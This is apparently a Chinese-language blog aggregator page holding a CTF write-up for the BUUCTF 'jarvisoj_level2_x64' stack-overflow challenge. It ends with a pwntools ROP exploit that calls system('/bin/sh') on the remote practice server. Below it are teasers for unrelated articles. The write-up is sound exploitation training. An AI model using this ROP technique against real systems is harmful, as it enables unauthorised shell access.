news 2026/5/26 10:03:24

BUUCTF[jarvisoj_level2_x64]

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
BUUCTF[jarvisoj_level2_x64]

步骤

使用checksec查看

使用ida(pro)打开

根进vulnerable_function函数

依旧是栈溢出

这道题我们无法使用上一题的32位来直接使用plt表来跳转到system,所以我们使用ROPgadget

使用指令 ROPgadget --binary 文件名 来获取信息

这里可以查看到pop rdi;ret的地址

在64位中前几个参数我们是使用寄存器来存储的,后续的存放下栈中

与32位直接存放在栈中不同,在此处我们需要向rdi寄存器中存入我们的后门函数地址

我们通过pop rdi;ret来将/bin/sh地址存入rdi寄存器,并且调用system函数

/bin/sh地址

system地址

exp

from pwn import * #p=process('./level2_x64') p=remote('node5.buuoj.cn',29996) pop_rdi_ret_addr = 0x4006b3 bin_sh_addr = 0x600A90 system_addr = 0x40063E pay = b'a'*(0x80+8) + p64(pop_rdi_ret_addr) + p64(bin_sh_addr) + p64(system_addr) p.sendlineafter(b"Input",pay) p.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/24 16:51:32

Qwen1.5模型能力评估实战指南:从基础配置到专业优化

Qwen1.5模型能力评估实战指南:从基础配置到专业优化 【免费下载链接】Qwen1.5 项目地址: https://gitcode.com/GitHub_Trending/qw/Qwen1.5 想要全面掌握Qwen1.5大语言模型的真实性能表现?本指南将带你从零开始,构建完整的评估流程&a…

作者头像 李华
网站建设 2026/5/25 1:26:20

构建下一代沉浸式数字体验平台的完整指南:React 360技术深度解析

在数字化浪潮席卷全球的今天,构建引人入胜的沉浸式体验平台已成为企业和开发者的迫切需求。React 360作为基于React的虚拟现实开发框架,为创建360度和VR内容提供了强大的技术支撑。本文将深入探讨如何利用React 360构建功能丰富的数字体验平台&#xff0…

作者头像 李华
网站建设 2026/5/24 0:44:20

Java 表达式命令执行

EL表达式实现命令执行 EL 表达式基础 Java Expression Language(EL)适用于 java EE 程序(尤其是 JSP 和 JSF)中简化数据访问和表达式计算的语言。EL主要用于在 JSP/JSF 页面中从 Javga 对象获取数据、调用方法等操作。在 JSP 中…

作者头像 李华
网站建设 2026/5/22 15:01:09

.NET MVC如何整合前端框架实现大文件上传?

作为福建某互联网上市公司项目负责人,我近期正为“大文件传输功能集成”课题带领团队攻坚——公司现有产品已服务金融、能源、政务等领域的200客户,其中超30%的国企、央企客户明确提出“100G大文件传输文件夹层级保留断点续传”的刚性需求。但市场上多数…

作者头像 李华
网站建设 2026/5/24 6:38:48

macOS iSCSI存储扩展方案:让苹果电脑变身网络存储中心

macOS iSCSI存储扩展方案:让苹果电脑变身网络存储中心 【免费下载链接】iSCSIInitiator iSCSI Initiator for macOS 项目地址: https://gitcode.com/gh_mirrors/is/iSCSIInitiator 想要为您的Mac电脑增加无限存储空间吗?macOS iSCSI Initiator是一…

作者头像 李华
网站建设 2026/5/22 13:16:08

PyTorch实战:从数据清洗到模型优化的温度预测全流程指南

PyTorch实战:从数据清洗到模型优化的温度预测全流程指南 【免费下载链接】Pytorch-framework-predicts-temperature PyTorch构建神经网络预测气温 项目地址: https://gitcode.com/gh_mirrors/py/Pytorch-framework-predicts-temperature 温度预测作为时间序列…

作者头像 李华